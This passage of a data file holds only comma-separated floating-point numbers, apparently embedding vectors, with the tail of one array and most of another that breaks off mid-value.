0.004685567,0.025129586,-0.0025309161,-0.002382938,0.008341694,0.006714684,-0.020822559,-0.016377058,-0.007605757,0.014129059,-0.010174342,0.026997602,0.0063290517,0.014947264,-0.004979601,-0.0052335165,-0.004399628,0.0024776915,-0.0039742384,-0.039699715,-0.014485875,-0.019192982,0.009060458,-0.029024271,0.0010234778,0.005476758,0.042607985,-0.050559666,-0.008313385,0.016962538,-0.013335265,-0.0056511704,0.013877083,0.0067257388,-0.023153946,-0.017592061,0.020319534,-0.005808413,0.0037925276,-0.018510023,0.00034287837,-0.007134069,-0.020162217,0.0014189407,0.018446974,-0.012412451,-0.005929581,0.00080180087,-0.0011793966,-0.00068725855,-0.014816696,0.013041833,-0.012557438,0.0034640303,0.005203627,0.00072182337,0.012777226,0.0133705465,0.0098435255,-0.027967863,0.00059673045,0.02486194,0.0027633298,0.022445215,-0.00022229705,-0.03261198,-0.023459977,0.0002712817,-0.0026561501,-0.0018148646,-0.01214682,-0.033994786,-0.005360119,0.0094534885,-0.0077975118,0.1333537,-0.035771728,0.008107329,-0.00724673,0.0029277033,-0.030361077,0.042126104,0.022511663,-0.010301375,0.008271929,0.011624086,-0.0001767091,0.0012191647,0.027228188,-0.012743613,-0.016541537,0.0005057804,0.144967,-0.011686962,0.025229733,-0.007064946,0.007545813,0.004009706,0.004367437,0.00629474,-0.083929434,-0.018851448,-0.03066249,-0.0075975056,-0.005156157,-0.031222338,0.01866968,-0.008848796,-0.0008587513,0.001993083,0.00052423315,0.012037888,-0.0033961276,-0.011254743,-0.0015044356,0.013881223,0.00043412013,-0.018229641,-0.005892325,-0.005876811,0.022910595,-0.029870607,-0.004816275,0.009563297,0.043402992,-0.009125667,-0.024474593,-0.00043457,0.024203334,0.016765613,0.0021690528,0.01905873,-0.019656653,-0.030625237,0.012463588,-0.0079207765,0.014980223,-0.014392364,0.020446042,-0.0118831,-0.0065673115,-0.01950425,0.001509239,0.0018615385,0.027326722,0.0016739018,-0.0023262715,-0.01568445,-0.0024254832,0.039035253,0.0030330129,-0.0261709,-0.0016622589,0.013374364,0.008937039,0.0274445,-0.0033954182,-0.013770025,0.001182415,0.019305239,0.0018387006,-0.014692169,-0.004991043,0.027993485,0.0017980293,-0.013440322,-0.0039871777,-0.007827018,0.009675188,0.019244874,0.02251567,0.011022779,-0.008089887,-0.009578734,-0.016928662,-0.0076761376,0.00855898,-0.0065888586,-0.009278194,0.012904947,0.006631062,-0.019950166,-0.019373383,-0.0033809114,0.011517657,0.029837232,-0.0015454869,-0.008347335,0.015974928,-0.0028363874,-0.0050155944,0.0014614278,-0.02065014,-0.029254582,0.021870583,0.005858429,-0.015517369,0.0096996,0.008039225,-0.01872296,0.0064604427,0.033528157,-0.0017761138,0.0018592462,-0.002779359,-0.010791345,-0.005610274,0.00961307,0.04962832,-0.010932623,-0.0128928255,-0.008760729,-0.04188045,-0.02402979,0.0038167916,0.0047647627,0.005971887,0.0063472786,-0.006917626,-0.009188145,-0.008010592,0.010003226,0.0065077287],[0.015533095,0.004575739,-0.020088231,-0.0012076062,0.0038724968,-0.033333402,0.021147843,0.01643544,-0.012245572,-0.0066067437,-0.010466391,0.016798101,0.0058166715,0.011317179,0.008430643,0.0033572074,-0.0043319818,-0.004700049,-0.006046244,-0.007819276,0.004146132,0.008071138,0.015328071,-0.00963055,0.002322591,0.0053743287,-0.021329572,-0.019705696,0.016555408,0.008457103,-0.0080863,0.03140493,0.0062921103,0.007593414,0.02288156,0.01169012,0.010139132,-0.011146879,0.011046976,0.014635515,-0.0005605999,0.027674451,0.024932617,0.015659628,0.012572709,0.011680043,-0.013837882,0.0057543963,-0.010600953,0.0068248375,0.015907446,-0.01962725,-0.029173259,0.014542715,-0.018517923,0.011058021,-0.009237034,-0.02317618,0.017955547,-0.00009262476,0.0027778733,0.017678453,-0.017194808,-0.032772575,0.033751316,-0.014629921,-0.00877666,-0.018316202,-0.006296662,-0.012417506,-0.0071468693,-0.00878809,-0.006255306,-0.0070681134,-0.007233953,0.02354245,0.008340198,-0.007883841,-0.0027623463,0.022237407,-0.0022513387,0.01224961,-0.0059801615,0.0015718894,0.02596053,0.009825996,-0.010328549,-0.005881993,0.009954162,-0.033937246,0.0012565908,0.015107054,0.014374783,-0.0011344178,-0.023913702,-0.003238196,-0.010194797,-0.014789188,-0.008046556,0.013011933,0.0013956182,-0.010902641,-0.039614983,0.0053041657,-0.004342385,-0.013604577,0.002390894,-0.0017714913,-0.0021322765,-0.016551595,0.024049839,0.01959037,-0.00886814,0.0111960005,0.023138668,-0.023102537,-0.00926981,0.0039393744,-0.0065513165,0.019690294,0.013947111,0.024181165,-0.0010336947,0.0010031046,-0.008783362,-0.0063232654,-0.013295066,-0.00014706815,-0.009371192,0.021683197,-0.0066192024,0.004678989,-0.036773384,-0.009565658,0.003564809,0.01422434,0.009783497,-0.011565104,0.0054229284,-0.00650489,-0.0024076465,0.00359967,0.008906657,0.009602957,0.012269153,0.018740058,0.0011242084,0.016582191,0.015484883,-0.027333172,0.01646448,0.00036141978,-0.009230046,-0.03009297,0.0053562764,0.024009401,-0.010390329,-0.018208234,-0.0027601786,0.0011520837,-0.0074471897,-0.005879962,0.012076775,-0.019619046,-0.0021853938,-0.030323688,-0.027423112,-0.0035456943,-0.028567228,-0.00061391934,0.016797267,0.02071342,-0.0005210597,-0.0021084968,0.0008939228,0.009691644,-0.018002179,0.004123655,-0.025745576,-0.008653647,0.014975424,0.011479905,-0.02164964,-0.0045415554,0.0048060645,0.018290093,0.02677576,0.0035670816,-0.010465438,-0.020227188,0.004338488,-0.02186447,-0.027839286,-0.010991526,-0.015500814,-0.023868548,-0.011726618,0.070807315,-0.0025765665,0.0033354273,-0.011347005,-0.01804153,0.015074725,-0.04550585,-0.016082004,-0.021226931,-0.0032483044,-0.014405187,-0.019662006,-0.011771198,0.011151686,-0.015598628,0.0067794747,0.0061071343,0.012738632,-0.03753471,0.018622018,-0.0009508329,0.032039825,0.024207564,-0.02338052,0.013619673,0.002708383,-0.02309443,-0.011250299,-0.025357137,0.0141599,-0.0067207892,0.00092490995,-0.0074648736,0.018153943,0.024881884,-0.028366486,0.007972393,0.014485369,-0.011810528,0.00423866,-0.011423382,0.0132129295,-0.017882345,0.01039608,-0.000854143,0.012526353,0.029800987,-0.023701617,-0.018699475,-0.002779048,0.0025108594,-0.021077398,0.038289063,-0.004964059,-0.027856397,0.027638145,0.044164576,0.0007036688,-0.030397462,0.0029539822,-0.029899305,0.016736075,-0.0065264157,0.04176078,0.015405925,-0.012911103,0.015177465,0.00936681,0.012171096,0.0071468037,-0.02981641,0.0039769993,-0.029235862,-0.008077915,0.004731475,-0.0054571466,0.009908819,0.018076884,-0.007186815,0.016169887,0.008962638,0.009036995,0.023860324,0.0003776095,-0.012062824,0.0048220856,-0.019742697,-0.010886534,0.006775045,0.0124964565,0.009634169,0.013975739,-0.025152402,0.011802219,-0.013688732,0.018684682,-0.00066064944,-0.021086637,0.0057762587,-0.0036932358,-0.0003454133,0.011160002,-0.022182962,-0.016425513,-0.0071726004,0.014369768,-0.011681245,0.0008050201,-0.0008331461,-0.007946012,0.042628467,-0.015222024,0.027171237,-0.030224174,-0.010793246,0.001409279,-0.019971924,-0.010909777,0.020425405,-0.014446289,-0.010601677,-0.0045800707,-0.0071391747,0.01094991,-0.01827379,0.027244406,-0.013115933,-0.023960106,-0.00053192244,-0.0013572185,-0.0122807,0.009981854,-0.007378266,0.00461493,-0.008894196,0.012999796,0.007348112,-0.027534628,0.015449617,-0.006493071,-0.007662097,0.010847639,-0.0030607006,-0.0013742669,-0.029212505,-0.036253557,0.012278747,-0.0026181035,-0.016397204,0.014607157,0.00550313,0.0059695127,0.0052908165,0.009703664,-0.021385828,-0.0058829198,-0.0007918677,-0.015133391,-0.0031441185,-0.0057965685,-0.023825126,0.008558824,-0.011175664,0.029053986,-0.0118726585,-0.0249045,-0.017140629,0.06523846,0.0022732439,-0.01673877,0.00040269073,-0.011851061,0.0019499206,0.020783653,-0.0038008506,0.021322027,-0.009748649,-0.006323612,-0.0055099702,-0.000028899736,0.016279636,-0.015302065,0.006098707,-0.018598229,-0.016675087,-0.0515706,0.0065686954,0.02284074,-0.017472424,-0.010673095,0.0015861128,0.0025314789,0.011438768,0.020360284,-0.0032581543,0.0077710208,-0.019467514,-0.00682649,0.0104749035,0.014765831,-0.014103612,-0.03517086,0.025351157,0.02722381,0.005348192,-0.03200636,-0.009863367,0.00921808,0.0020446212,-0.00040894237,-0.007605257,-0.005982227,0.013521133,0.0026979023,-0.006389791,-0.0023829304,0.029905202,0.011136954,0.034128513,-0.0056742486,0.0053040637,-0.0044856034,0.00050945254,0.020613153,-0.039897453,0.052178692,0.032948006,0.03064121,0.021023825,-0.013218974,-0.012684684,-0.010577928,0.039976485,-0.016155832,-0.016742904,0.007673589,-0.00623435,-0.005609705,0.010492894,0.0010644426,-0.0031816086,-0.0020143248,0.01208631,0.008058173,-0.0033073437,0.003205563,0.036732446,-0.0012935732,-0.013582399,-0.0014693598,0.002216958,-0.01632524,0.0011431545,0.0026674962,0.010676067,0.0012726216,-0.0115929935,0.0035950204,0.022227481,0.0194739,0.0059544924,0.019538546,0.033662077,0.020476624,0.024607632,-0.0047564404,0.034682356,-0.0046293163,0.0035005568,-0.018435016,-0.033230945,-0.0025203573,0.0001087825,-0.001194042,0.0026018613,-0.0005103328,0.03679281,-0.016325269,-0.011896901,-0.012780583,-0.010998445,-0.026535543,-0.032789968,0.0007252126,-0.00478972,-0.021903668,0.008973726,0.026008695,-0.0032899766,0.004429421,0.012942918,-0.012013377,0.01170711,-0.017079491,-0.02158324,0.01889688,0.0037940582,0.01299073,0.015382677,0.018542133,-0.027067605,0.0089559145,-0.009856893,-0.019671775,0.0008507477,0.03855289,0.033413466,0.03087696,0.009262296,0.021419376,-0.02207111,0.009300711,0.00569291,0.020517336,0.0076344847,-0.02343956,-0.0055316915,-0.018803526,0.0014124454,0.003515517,-0.019570364,-0.009792889,-0.01284859,-0.00030135782,-0.0012268062,-0.00010692341,-0.020248303,0.02472306,-0.019881891,-0.0064278753,0.01601966,-0.00906412,0.02906232,-0.020831041,0.05386698,-0.0241626,-0.041519437,0.0031110512,0.01204213,-0.00091793126,0.013135472,-0.0072365627,-0.021612749,0.010229101,-0.0028269521,0.02042843,0.005325015,0.021724844,-0.0035897556,0.0050211283,0.0036266635,0.0032159442,-0.0065448107,-0.009631466,0.007528968,-0.0106075695,-0.020113885,-0.031321343,0.0034878785,0.008253539,0.041664805,0.011334349,-0.039461978,-0.01246402,-0.00041235608,0.013507815,0.016443513,-0.003723053,0.0075287996,0.0048390483,-0.0038377095,-0.0021769472,-0.001985359,0.03450704,-0.0049808077,-0.0035756105,0.010531933,0.010502667,0.018691156,0.00349326,0.024410933,0.02771797,0.012983043,-0.014689856,-0.0038992104,0.0139763355,0.021106016,0.025617708,-0.007844831,-0.0012620307,0.010469031,0.006111447,-0.0073644323,0.006761369,-0.016899077,-0.010037479,-0.00046943992,-0.029531589,-0.020932332,-0.008208981,-0.009638561,-0.0026121107,-0.009940179,-0.024466166,0.011984881,0.023202084,-0.0053224606,-0.004636358,0.008538381,0.0068210214,-0.001363964,0.018665582,0.0094017545,-0.019269928,0.0077213096,0.03175255,0.00082311593,-0.004241098,0.0034189671,0.020237325,-0.0088970065,0.0048750034,0.008713072,-0.008290902,-0.010586336,-0.014666891,0.024876997,0.0051570726,0.013592331,0.011329379,0.0021187526,-0.011321992,-0.006596424,0.006512244,-0.019716062,0.005287952,-0.014834327,0.015495965,-0.014165757,-0.012706331,0.009949534,-0.0041551935,-0.011722482,-0.0011604447,0.009961315,-0.055384863,0.0019178349,0.023890626,0.0004473617,-0.010552015,0.03574291,0.002928346,0.00045717528,-0.006710782,-0.01367898,-0.010280084,0.00013539418,0.0014874255,-0.0079991715,0.007821946,-0.01932516,-0.037522946,-0.029549172,-0.01024887,-0.06363723,-0.02520616,0.028435191,0.004468875,0.004525396,0.0024030248,-0.022386126,-0.019313408,-0.0152252605,-0.0048588715,-0.053906843,-0.0009349139,-0.004477638,-0.024356894,0.0140311625,-0.010977071,-0.021443963,-0.010940691,-0.022313004,-0.01072725,0.009368298,-0.00032076164,-0.013735822,0.00015310942,0.023814766,-0.0044959853,0.0394108,-0.0021826006,0.014155219,0.016444404,0.021498488,0.008141956,-0.01566879,0.00010092702,0.0052532,-0.004492775,0.0017610083,-0.016386911,0.017341599,0.008272813,0.0075621265,0.009205131,0.004928969,-0.0010159212,-0.012771425,-0.02229368,0.032282773,0.02221189,0.011898121,0.011513285,-0.020998225,0.03312701,0.0028380982,-0.005257465,-0.01830313,0.013992806,0.020776276,0.013554826,0.03942559,0.0030919064,-0.005558366,-0.01823865,-0.039756797,0.007346724,0.042962343,0.02228163,0.024747964,0.00023556701,-0.007131899,0.0147277275,-0.0043832394,0.012340917,-0.009551739,-0.0068343617,-0.021607073,0.006205036,-0.019135794,-0.001058169,-0.034146473,0.025011146,-0.0042580175,0.022132808,0.00074487075,-0.014743669,0.00276768,-0.0025254944,-0.012808523,-0.0067789336,-0.024741076,-0.011096128,0.026087724,-0.022756051,-0.0041361437,0.012499603,-0.0071684546,0.005468436,0.020614987,-0.0015883155,-0.02438551,0.0032231023,-0.0031403762,0.010430574,0.004814731,0.036499888,0.013415689,0.01614184,-0.008158692,-0.016647328,-0.0021242457,-0.01731986,-0.0059964163,0.040407836,-0.012655314,-0.00383733,0.001054069,-0.030996012,-0.008439705,0.0055386466,-0.03270883,-0.031808987,0.012719683,0.0071363365,-0.00020283728,0.011967902,-0.025426442,0.04748227,0.02641714,-0.015231409,0.016812565,-0.026742885,0.028770294,0.021622274,0.022628916,0.004937177,-0.035418794,0.015250191,0.007375479,-0.0044036293,0.019707825,-0.000710273,-0.034596175,-0.027026724,-0.029894024,0.0025117586,-0.019104764,0.007211239,0.020897452,-0.012435462,0.03485104,-0.018397251,0.033083558,0.0053513413,-0.007538037,0.0063447086,-0.013207254,0.02440619,-0.033648938,-0.021047262,0.01997152,-0.024829715,0.021009753,-0.0005942002,-0.034172922,-0.016189082,-0.026292125,-0.0009771021,-0.025293529,0.009384415,0.008770078,-0.006483833,-0.0040167402,0.016983692,-0.0038539453,0.021789506,-0.02678167,-0.0207132,-0.002840833,0.011646112,-0.0152993165,0.017642247,-0.011053138,0.011376133,0.0034121375,0.0060203196,0.020926785,-0.0047208644,0.0119793005,-0.02085104,0.004750379,-0.0121129155,-0.008116658,0.032682836,-0.0260554,0.014069708,0.02541547,0.011116269,0.009450546,-0.015724476,-0.021528201,-0.0065518217,-0.012823778,0.012279846,-0.003947329,0.036049433,-0.00009286345,0.0070858775,-0.0017176617,0.0077421633,0.029600793,-0.009557402,0.001020254,0.011445103,-0.0031980085,-0.016731698,-0.015004142,0.00010165323,-0.0010322175,-0.011122006,0.012969273,0.00021720416,0.021388905,0.029772582,-0.020315055,0.010950633,0.02178997,0.0048588626,0.01970788,-0.0065679406,0.014998542,0.0021840257,0.018046137,0.024827354,-0.04039181,0.004445496,-0.019871555,0.0033777538,0.009088609,-0.037186865,0.0068435003,0.00047687656,0.022130415,0.020267416,0.0027768249,0.0069766417,-0.0043033487,-0.007017965,-0.018370412,0.0036704927,0.021190371,0.005040653,-0.011517686,-0.00544209,0.001725291,-0.0075299046,0.016631313,0.0015046124,0.0039217635,0.0013773456,0.0039439276,0.008877615,0.0058220285,-0.041349187,0.0062259706,0.028561737,-0.028434109,0.0024840198,-0.02140587,-0.02008106,-0.009544476,-0.02334365,-0.008202232,-0.0015611028,0.009492214,0.01817093,-0.020367656,-0.01552476,-0.004567537,-0.06399918,0.017832069,-0.026508084,-0.00864653,-0.011217867,0.012479476,0.008515128,-0.0009932495,0.057549495,0.005536111,0.0083411895,-0.019740596,-0.0038281358,-0.0023605106,-0.014024995,-0.0044619697,-0.015214269,0.0091816615,0.010510548,0.021347908,-0.00021106518,-0.0116410805,0.00035129706,-0.01268025,0.013084523,0.011911439,-0.00776356,-0.0060261763,-0.049729813,0.0046268306,0.013275816,0.016883003,-0.0045363805,-0.008283342,-0.03168006,-0.026227083,0.004783073,-0.0051446944,-0.026374498,-0.006125462,-0.013447887,0.006306728,0.0023565989,0.026072472,-0.016111964,-0.031979855,0.010718927,-0.005774856,-0.014883043,-0.005725397,0.016080365,0.015981082,-0.0085202595,0.03320665,0.0018276555,0.019808074,-0.019477243,0.008041048,0.02209899,-0.005084639,0.011228584,-0.00036105182,0.0074615963,0.019205263,-0.008642826,-0.008843788,-0.034193505,0.014856484,-0.0012990823,-0.00887299,-0.013166106,-0.012905572,-0.040557116,0.002662022,-0.014359917,0.017801082,-0.01630891,-0.008866327,-0.0064285956,-0.0053218543,-0.008450132,0.045604814,-0.02023386,0.01578927,-0.01829559,-0.000080626145,0.013543709,0.013554032,0.007438066,-0.0154548995,0.010198434,-0.000015373513,-0.01001757,0.031814855,0.0005003783,0.0071214144,0.019476425,0.009564646,-0.0037004643,-0.024851093,0.026661836,-0.011536631,-0.0076238103,0.030183466,0.0057872767,0.0005713096,-0.0025790639,0.019220814,0.0042618304,0.020722166,-0.014507389,-0.0027255677,0.01212173,-0.00053512136,0.010244474,0.014922679,-0.0059453747,0.03367244,0.009322145,0.03367098,-0.010845228,-0.0093374625,-0.0041314447,0.00012987969,0.0013393785,0.0053752097,0.012252911,0.008483916,-0.011657973,0.012811507,-0.01574915,0.02585254,0.002478309,-0.0131841125,0.026358312,-0.009928382,0.01946405,-0.027552385,-0.0041057626,0.0036752156,-0.021995582,0.008607855,-0.025172397,0.013075721,-0.006765151,-0.0019852626,0.01045698,0.007077383,0.012712713,-0.012482691,0.0025372102,-0.0062698615,-0.0013520145,0.005797739,-0.028771067,-0.028907897,0.0040675383,-0.016442752,0.003958358,0.011578086,0.0037545464,-0.013784599,0.002239734,-0.001808039,-0.014574035,0.009995867,-0.0021854814,0.013100649,-0.009688471,0.006490247,0.00051312486,-0.0070076557,-0.020900667,0.016062882,0.011653131,-0.011178779,0.030779384,0.026153063,-0.028607719,0.020058189,-0.018069027,0.04156218,0.021578846,0.004297862,0.0025433768,0.008031163,-0.022568947,-0.01303827,-0.0050137797,-0.01869614,-0.012878426,-0.0119496165,0.004613844,0.014494924,-0.016157996,0.03978484,-0.007972895,0.008962314,0.0036317185,-0.025029592,-0.004976143,0.041053735,0.01246034,0.005142714,-0.0077491887,-0.0047135972,0.006563947,-0.04938502,-0.0070226546,-0.0032767926,-0.002065302,-0.020851076,-0.008583317,-0.02901903,0.009906661,0.00092692615,-0.012157751,0.004135174,0.0071154586,-0.009590178,0.0036273745,0.004338546,-0.0079516135,0.016118748,0.010691812,-0.01673646,0.02913815,0.010071057,-0.0056112735,-0.012941104,0.011000096,-0.0065259635,0.026632233,0.019195257,-0.024393441,0.0050873226,-0.00035783424,0.0007625903,-0.026070816,0.00029857896,-0.0030484137,-0.010094352,0.0016262975,-0.00030187398,0.0015747846,0.016780844,-0.00463029,0.018999593,0.0025800713,0.014632179,0.003685227,0.008378021,0.006663011,-0.00563575,-0.011709588,0.0073822928,0.0017404442,-0.032210007,0.011389227,-0.030403519,-0.01985939,-0.0036288328,-0.006356324,0.003433638,-0.030327464,-0.01691912,0.017661039,0.010128153,0.002345019,0.013186092,-0.0016237822,0.031617884,-0.0045896433,0.016710842,0.001553057,0.020606056,-0.015473158,-0.008976618,0.013458646,0.025466343,0.022464782,0.005522334,-0.0018225617,-0.0005799716,0.023258733,0.033669025,-0.0016864376,-0.00558087,0.017932866,0.0066134236,-0.02062591,-0.022823544,0.013521986,0.009526722,0.008392842,-0.003947958,-0.018901898,-0.023732536,0.016035305,-0.014712983,0.08247413,0.01978063,0.0054121325,-0.0010916952,0.018010125,-0.01884093,0.042698544,0.017270891,-0.0020912685,-0.01202722,-0.045077,-0.017073074,-0.009078587,-0.0049126325,0.029931076,-0.020606317,-0.0046452424,0.0094629135,0.011504345,-0.0057519847,0.011077672,-0.007060347,0.0008426015,-0.01679039,0.010930737,0.0088602565,-0.0010938746,-0.017317487,0.026145602,-0.0050162566,-0.01459232,-0.0064292424,0.023883382,0.0033040447,-0.007884307,-0.0033176206,0.025549132,-0.027178861,-0.016864443,0.00046992215,-0.012974844,0.0008201048,0.036815636,0.0022169598,-0.0055719055,-0.018050458,-0.013725208,0.0003695388,0.007579465,-0.004793353,0.009893168,-0.012838534,-0.0031358863,0.005446878,0.009720975,-0.006516688,0.013074223,-0.0008192667,0.03892468,-0.017396774,0.0013651203,0.0057103387,-0.0079068635,-0.017104737,0.0024036819,-0.013941193,0.016347067,-0.013332978,0.012655565,-0.027029172,0.016364489,0.0037655036,0.009446763,-0.009763715,-0.012620591,0.022374664,-0.006081296,-0.02382128,-0.0012632136,-0.013763939,-0.0014841865,0.0025415549,0.025563851,0.00898784,0.002087444,0.010294061,0.0020892352,-0.0021512208,0.05321429,0.015973657,0.012480633,0.019655365,-0.011741912,0.01978993,0.00565357,0.012704374,0.01734539,-0.019234508,-0.008225165,0.023248132,-0.014543349,-0.0027529786,0.020874022,-0.0053780274,0.012563593,0.0032458445,0.012844525,-0.019401688,0.007712033,0.0055639492,0.016068038,0.022251928,0.024029076,0.0028921778,0.007644612,0.00009651698,0.032831658,-0.0065947557,-0.002669958,-0.018192131,0.008330949,-0.01665593,-0.005553192,-0.053706814,0.013455554,0.05744704,0.000009469038,-0.010066282,0.017750867,-0.008281716,0.008772451,-0.113385595,0.0053026965,0.006513705,0.009258056,-0.0146692,-0.018513693,0.0040570647,0.009250722,0.008929197,0.0067931,-0.019807292,-0.00087306555,0.040023245,-0.013644474,-0.0046577575,0.0039002048,-0.02446358,0.013043722,-0.016219718,-0.011068476,0.013346535,-0.0066543506,-0.009903999,-0.029269785,-0.005266603,-0.0013590126,0.021785907,-0.003745453,-0.008476365,0.005208283,0.0044792425,0.010265932,-0.01585884,0.022573598,0.042374946,0.018873785,-0.008897465,-0.046333823,-0.13452803,-0.0018230516,0.0015325974,-0.01659555,0.027388958,-0.021932362,-0.008480282,-0.015099569,0.006947756,-0.010928702,-0.0049998383,0.0056550214,-0.018117208,0.012447686,-0.004225091,0.0026026564,-0.00906288,0.0077630975,0.0024037238,0.0021155905,0.02365267,-0.015513102,-0.0016157419,-0.00792788,-0.018358326,0.006100025,-0.014030244,0.012672444,-0.000334701,0.014101261,-0.011585812,0.014508364,-0.019038873,-0.010856319,-0.009393511,-0.017027477,0.0051542013,-0.0063925735,-0.012944869,0.01954969,0.0140159745,-0.010215899,0.012976503,-0.008039326,-0.013868318,0.007440312,0.017944893,-0.002604129,0.016827898,-0.0008307831,0.017248176,0.005673633,-0.010095458,0.025649792,-0.0008809916,-0.001918689,-0.020859594,-0.017937027,-0.014895594,0.0091210855,-0.009096529,-0.023374647,0.0140232565,0.003243159,0.03343682,-0.0013406464,0.012087074,-0.04953594,-0.013494122,0.014117239,-0.0063320464,0.007284765,0.016213639,-0.00008138554,0.02806172,0.008882811,-0.0072658192,-0.000040541872,0.015302919,-0.007492092,0.02249091,-0.001884282,-0.0027107827,-0.024098918,0.019652672,-0.012206017,-0.00441729,-0.0010701785,-0.012958701,-0.019486057,0.026752483,-0.023096263,0.025134876,-0.010686493,0.014228971,-0.0031786766,0.032181352,-0.016484302,-0.013725168,0.005755392,0.01776862,-0.014344772,-0.024483256,-0.008366485,0.0031041552,0.0059493757,-0.010357539,-0.011669397,-0.010544842,0.0065376125,-0.01678527,-0.004897287,0.02634925,0.011393668,-0.020681677,-0.0022729712,-0.014496974,-0.0040406226,0.010779178,-0.0015735883,-0.017512942,0.009049397,-0.035424836,0.027893944,0.0431123,0.027740898,-0.0121239405,0.004083742,-0.0022652943,-0.00048319015,-0.030882861,-0.0049548917,-0.006770709,0.015096288,-0.0050015533,0.0052870116,-0.00820123,-0.018341145,-0.02430382,-0.00045702772,-0.012290443,-0.0039777583,-0.013082033,0.010018702,0.01611589,-0.016087092,0.05170696,-0.0139204925,0.012378441,-0.007648758,0.0107772555,0.014604755,-0.016998712,-0.016032897,0.019317083,0.03506336,-0.0074480227,-0.016051613,0.009046639,0.0037816518,0.0060121124,0.033747744,-0.030628828,-0.0055543394,-0.007983539,-0.028738683,0.009310048,-0.016005445,0.017188638,-0.014465905,0.032017108,0.013572036,0.010917705,-0.012540825,-0.009921931,0.008292357,0.00036012108,0.0022087372,0.018706404,0.033226117,-0.0023703526,0.0050836187,0.00517717,-0.004537334,0.012622894,-0.002510373,-0.010927807,0.010303765,-0.005387285,-0.0068259416,-0.036937296,0.007679539,-0.0059760544,-0.008120908,-0.01130015,-0.006756515,0.012661301,0.0011725691,-0.034239564,-0.0061905202,-0.024046406,-0.00981893,-0.010486258,-0.0037575164,-0.009902393,0.014502806,0.019030115,0.028501404,-0.014924294,0.005384816,-0.033088293,-0.00048406047,-0.007243178,-0.00667953,-0.020571567,0.014877587,-0.01960456,-0.012693098,-0.0011616386,-0.023115987,-0.003487872,-0.012012685,-0.01996694,0.00095640117,0.010659018,-0.007904351,0.0130392,-0.033876628,-0.00037982545,0.0001797095,0.0020530662,-0.0071515744,0.0072617377,-0.022146681,0.006070999,0.011040195,0.0008022099,0.012341231,-0.0057657147,-0.013917923,-0.023795145,-0.00061986607,0.053058613,-0.02042444,0.0069840048,0.02190856,0.004625458,0.03192633,-0.0031569258,0.0011107534,0.02556534,0.025478669,0.015015977,0.024267431,-0.0020734044,0.012479077,0.016518874,0.014695916,-0.03284905,-0.0012405764,-0.015477678,0.008125336,0.0036820457,0.02172935,-0.012992215,-0.014218937,-0.011947369,0.008923794,-0.003919763,-0.009146604,0.030044073,-0.008486623,0.0011947386,0.018122261,0.0011520917,-0.0031017445,0.004350968,0.020633154,-0.014130845,0.03159554,-0.021851368,-0.0014459139,0.024489727,-0.033349294,0.017187815,-0.0084591545,0.060470164,0.015066334,-0.01837656,-0.017960696,0.004164733,0.0056528286,0.0073011774,0.0014635704,0.010574001,-0.038814556,-0.0021598926,-0.0039071604,-0.014977504,0.0026897662,0.0021575561,0.0038426523,0.007062128,-0.037093256,0.016165636,-0.028586099,0.015275723,0.013747628,0.0071559516,0.010078465,0.007823709,-0.022284731,-0.0070957486,-0.0047623417,-0.00006245621,0.016114691,0.017753065,0.014448276,0.010915927,-0.01327592,0.033531792,0.039122704,-0.0056844647,0.020873725,0.002212874,-0.019557783,-0.020845735,0.002355165,0.0010795633,-0.0122528635,0.0053215963,-0.0009006133,0.018282527,0.0053893025,-0.0152753,0.009073639,0.02296758,-0.0035228746,-0.017017042,-0.01527425,0.026745848,-0.015020216,0.015483648,-0.014497534,0.002594368,0.0029246826,-0.0108702695,-0.015873455,-0.011479959,-0.012021702,-0.0024168869,0.020049667,-0.0036886516,0.0026198463,0.014115427,0.011393389,0.03437103,0.010442381,-0.01466011,0.0006205785,-0.027035456,-0.030754734,-0.013568966,-0.020788725,0.001647886,-0.005911717,-0.01840954,-0.0017263988,-0.00504417,-0.022953551,-0.012264996,0.013861333,0.023569211,-0.014056391,-0.034073826,-0.021265192,-0.0050381073,0.012110681,-0.013067629,0.018160252,-0.011363622,-0.032135364,0.037526492,-0.03745406,-0.002530616,-0.008317239,0.014274665,0.020546041,-0.018990004,0.009096157,-0.043707248,0.00051590725,-0.014724937,-0.016108602,0.0052846726,0.013730998,-0.03712551,-0.012779374,-0.011149802,-0.011087975,0.003565163,-0.001795579,0.01487343,0.0033416501,0.020083636,0.013447576,-0.021050043,-0.021355592,-0.006586036,0.014988558,-0.01905056,0.01810279,0.0046629612,0.008377958,-0.023335336,0.01580646,-0.021383168,-0.018069113,-0.011515841,0.008410097,0.007807785,0.0043182448,0.036409978,0.023350319,0.0054058926,-0.01558316,-0.018670866,0.0004285761,-0.0022060713,0.00046807015,-0.01272528,-0.0018278608,0.0014403985,0.020262025,0.031984117,0.016674783,-0.01046237,0.0064857462,0.016342167,-0.0068672667,-0.014110728,0.0033783019,0.021680519,-0.01634527,-0.026315246,0.009476888,0.0068407273,0.026683442,0.0017818635,-0.028425487,-0.0054148138,-0.0042965626,-0.03823273,0.01177158,0.0015820991,0.013433387,-0.0027480342,-0.009740439,0.021640627,-0.010949946,0.015456542,0.018456096,-0.01273373,0.027358621,-0.002414018,-0.019260151,0.018873926,0.020297151,-0.011676699,0.023931898,0.008154538,0.026123963,0.02715143,-0.012692775,-0.0016436001,-0.0030597607,0.0017044845,0.010125689,-0.005697934,-0.00842861,0.037088457,-0.017573291,-0.037326545,-0.0096229715,0.0018201772,0.00094343734,-0.014221707,0.021674657,-0.07843971,0.022485858,-0.010323862,-0.016389541,-0.02313539,-0.0009746841,0.001764406,0.028391862,-0.00435677,-0.022420507,0.0032950728,0.021068323,0.0062929792,-0.0043198545,0.0076251086,0.0039256294,-0.0037674299,0.011104992,-0.0068074386,-0.004772151,0.019777007,-0.02392512,0.009020396,-0.008261042,0.009936017,0.0040576593,0.012715532,0.017687656,0.0068760677,0.015588491,-0.020574903,-0.0015147179,0.011036199,0.016488196,0.00041101532,-0.013278795,0.006833391,-0.00001186318,0.014710947,0.028059179,0.0001283017,-0.01066963,-0.018399976,0.003976052,-0.0048399996,0.002287061,0.015037327,0.032426268,0.028513499,0.009921422,-0.030773513,-0.000007563345,0.00065731903,-0.0031301656,-0.0143679185,-0.00020863884,0.009371097,-0.006095398,0.005779647,-0.008370005,-0.009969629,0.0061178114,0.011466157,-0.013481669,0.019121042,-0.015326727,-0.00035269276,0.00084557146,-0.037228644,-0.0016797956,-0.010425286,0.0065165246,-0.0070822323,-0.007750853,-0.009888097,0.012343508,0.016754724,-0.0040305057,-0.006622746,0.01773604,-0.031895656,-0.009844679,0.008793724,-0.0036016584,0.00034834057,-0.011591026,-0.007765527,0.016295148,-0.020931516,0.014853863,0.0063581686,0.0026795564,-0.0013143233,-